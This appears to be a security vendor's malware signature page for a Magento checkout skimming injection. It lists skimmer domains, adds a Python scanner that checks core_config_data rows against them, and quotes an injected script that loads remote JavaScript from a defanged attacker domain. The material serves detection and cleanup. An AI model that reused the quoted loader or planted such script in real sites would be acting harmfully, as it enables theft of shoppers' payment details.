SiteCheck Signatures

malware.magento_shoplift.38.2

Description: Injection of malicious scripts into Magento checkout pages. The scripts steal entered payment details and send them to remote third-party sites.

The scripts are typically injected into the core_config_data table.

Sample:

<scri pt type="text/javascript">var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
po.src = 'controlmage[.]com/e/tracking.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);</script>

Domains involved: apissystem[.]com, codesmagento[.]com, controlmage[.]com, cdnppay[.]com, resselerratings[.]com, cdngoogle[.]com, apismanagers[.]com, verpayments[.]com, myageverify[.]com, assetsbraln[.]com, verpayment[.]com, magesources[.]com, traskedlink[.]com, magejavascripts[.]com, mjs24[.]com, m24js[.]com, cdnassels[.]com, magescripts[.]pw and jscriptscloud[.]com
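A check for the injection described above, as an added example (not SiteCheck's signature and not code from this page): it scans rows exported from core_config_data for script sources, including the dynamic `po.src = '...'` loader form shown in the sample, whose host is on the domain list. The (path, value) row layout, the config paths, the sample rows and the function names are assumptions made for illustration; only a subset of the listed domains is included, kept in defanged form.

```python
import re

# Subset of the domains listed on this page, kept in defanged form.
LISTED = ["controlmage[.]com", "cdnppay[.]com", "magescripts[.]pw", "jscriptscloud[.]com"]
BAD_HOSTS = {d.replace("[.]", ".") for d in LISTED}

# Matches both <script src="..."> and the dynamic loader form  po.src = '...'
SRC_RE = re.compile(r"""\bsrc\s*=\s*['"]([^'"]+)['"]""", re.I)

def host_of(src):
    """Return the lower-cased host of a script source; the scheme is optional."""
    s = src.strip().replace("[.]", ".")  # accept defanged samples too
    s = re.sub(r"^(?:[a-z][a-z0-9+.-]*:)?//", "", s, flags=re.I)
    return s.split("/", 1)[0].split(":", 1)[0].lower()

def on_list(host):
    """True for a listed domain or any subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in BAD_HOSTS)

def scan_config(rows):
    """rows: iterable of (path, value) pairs taken from core_config_data.
    Returns a (path, host) pair for every script source on the list."""
    hits = []
    for path, value in rows:
        for src in SRC_RE.findall(value or ""):
            host = host_of(src)
            if on_list(host):
                hits.append((path, host))
    return hits

# Constructed rows (paths are illustrative); the second mirrors the sample above.
SAMPLE_ROWS = [
    ("web/unsecure/base_url", "https://shop.example/"),
    ("design/head/includes",
     "<script type=\"text/javascript\">var po = document.createElement('script'); "
     "po.async = true; po.src = 'controlmage[.]com/e/tracking.js'; "
     "var s = document.getElementsByTagName('script')[0]; "
     "s.parentNode.insertBefore(po, s);</script>"),
    ("design/footer/absolute_footer",
     "<script src=\"//static.shop.example/js/chat.js\"></script>"),
    ("design/footer/absolute_footer", None),
]

if __name__ == "__main__":
    for path, host in scan_config(SAMPLE_ROWS):
        print(f"{path}: script loaded from listed domain {host}")
```

A clean result only means none of the included domains appear; any script source in a config value that the site owner cannot account for still warrants review.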

For additional details check the Ecommerce security category of our blog.

Affecting: Magento

Mitigation: How to clean a hacked Magento site